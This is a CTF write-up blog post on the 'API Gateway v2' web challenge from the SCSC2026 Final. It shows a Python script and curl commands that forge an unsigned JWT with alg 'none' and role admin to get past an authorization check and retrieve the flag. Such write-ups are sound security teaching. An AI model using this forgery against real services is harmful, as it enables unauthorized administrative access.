238 words
1 minutes
SCSC2026 Final - API Gateway v2 - Web Writeup
Event Archive

SCSC2026 Final

Posts, writeups, and notes grouped under this event.

Archive/15 posts
Events/SCSC2026 Final
2026-05-16
Writeup
CTF
/
Security
/
Web

Category: Web

Flag: SCSC26{t0k3n_b0d0ng_b1s4_j4d1_4dm1n_b3s4r}

Description: API Gateway kami menggunakan sesi berbasis JWT (Stateless). Saat ini Anda terhubung sebagai role: guest. Developer meninggalkan fitur debug yang memungkinkan “none” algorithm untuk testing internal. Bisakah Anda memanfaatkannya untuk menjadi admin?

The service was an API gateway at http://sriwijayasecuritysociety.com:8007/. A first request showed that the server created a JWT session in the api_token cookie. The body was empty, but the cookie mattered.

curl -si http://sriwijayasecuritysociety.com:8007/
HTTP/1.1 200 OK
Set-Cookie: api_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbm9ueW1vdXMiLCJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3Nzg5MTE5MjF9.33SOsKo5PU2sGHfmPRF_8fygX9PsmAvk0SyShqB92RY

Decoding the token showed a normal HS256 header and a guest payload. The user was anonymous, and the role was guest.

Header  : {"typ":"JWT","alg":"HS256"}
Payload : {"sub":"anonymous","role":"guest","iat":1778911921}

Sending the cookie back made the page render the gateway dashboard. The page named the protected endpoint as /v2/admin/dashboard, rejected the guest role, and printed a debug footer saying the token was verified via JWT HS256 (or compatible). That matched the challenge hint about a debug feature accepting the none algorithm.

"role": "guest",
"error": "Forbidden. Admin role required."

The fix was to forge a JWT with alg set to none, set role to admin, and leave the signature empty. This script builds the token used in the request.

import base64
import json

header = {"typ": "JWT", "alg": "none"}
payload = {"sub": "admin", "role": "admin", "iat": 1778911953}

def encode(value):
    raw = json.dumps(value, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

print(f"{encode(header)}.{encode(payload)}.")
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc3ODkxMTk1M30.

The forged token went into the same api_token cookie. The trailing dot is the empty JWT signature.

curl -si http://sriwijayasecuritysociety.com:8007/ -b "api_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc3ODkxMTk1M30."
"user": "admin",
"role": "admin",
"data": {
    "flag": "SCSC26{t0k3n_b0d0ng_b1s4_j4d1_4dm1n_b3s4r}",
    "secret_config": "enabled"
}
SCSC2026 Final - API Gateway v2 - Web Writeup
https://blog.rei.my.id/posts/157/scsc2026-final-api-gateway-v2-web-writeup/
Author
Reidho Satria
Published at
2026-05-16
License
CC BY-NC-SA 4.0
© 2026 Reidho Satria. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari